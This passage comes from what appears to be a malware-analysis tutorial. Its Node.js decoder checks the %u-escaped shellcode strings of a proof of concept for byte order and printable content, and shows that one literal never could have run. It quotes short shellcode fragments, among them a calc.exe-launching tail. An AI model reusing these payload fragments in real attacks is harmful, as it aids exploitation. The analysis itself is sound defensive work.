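  units.forEach((u, i) => { out[2 * i] = u >>> 8; out[2 * i + 1] = u & 0xff; });
  return out;
}

function toHex(bytes) {
  return Array.from(bytes, (b) => b.toString(16).padStart(2, "0")).join(" ");
}

// Printable runs of at least minLen bytes, like the `strings` tool.
function printableStrings(bytes, minLen = 4) {
  const found = [];
  let run = "";
  for (const b of bytes) {
    if (b >= 0x20 && b < 0x7f) {
      run += String.fromCharCode(b);
    } else {
      if (run.length >= minLen) found.push(run);
      run = "";
    }
  }
  if (run.length >= minLen) found.push(run);
  return found;
}

// Offsets at which two byte sequences disagree (a length mismatch counts too).
function diffBytes(a, b) {
  const out = [];
  for (let i = 0; i < Math.max(a.length, b.length); i++) {
    if (a[i] !== b[i]) out.push(i);
  }
  return out;
}

// Fragments copied from the PoC: the test() string, the bytes its DISASM
// comment lists, the tail of the "Shellcode Calculator", and the first line
// of evilcode exactly as written (note the missing leading "%u").
const TEST_STRING = "%u31C9%u5589%uE55D%u2EF8%uC390%u9090";
const LISTING = Uint8Array.from([0x31, 0xc9, 0x55, 0x89, 0xe5, 0x5d,
                                 0xe2, 0xf8, 0xc3, 0x90, 0x90, 0x90]);
const CALC_TAIL = "%u6163%u636C%u652E%u6578%u9000";
const EVIL_HEAD = "6B70%u6E63%u2066%u6F72%u204A%u442E%u2066%u6F72%u2049%u6E74";

// Which byte order did the author of test() use? Compare both against the listing.
function testStringByteOrder() {
  const units = parseUnits(TEST_STRING);
  return {
    bigEndianMismatches: diffBytes(toBigEndianBytes(units), LISTING),
    littleEndianMismatches: diffBytes(toLittleEndianBytes(units), LISTING),
  };
}

console.log("test() string, high byte first:", toHex(toBigEndianBytes(parseUnits(TEST_STRING))));
console.log("DISASM listing from the comment:", toHex(LISTING));
console.log("mismatch offsets:", testStringByteOrder());
console.log("calc tail, little-endian:", printableStrings(toLittleEndianBytes(parseUnits(CALC_TAIL))));
try {
  parseUnits(EVIL_HEAD);
} catch (e) {
  console.log("evilcode as written:", e.message);
}
console.log("evilcode with %u restored, high byte first:",
  printableStrings(toBigEndianBytes(parseUnits("%u" + EVIL_HEAD))));
```

Run it with `node decode.js`. The same parser is the first thing to run over any `unescape()`-based payload found in the wild: a byte-order mismatch against the author's own listing, or a literal that never passed through `%u`, tells you whether the string could ever have executed the way the comments describe.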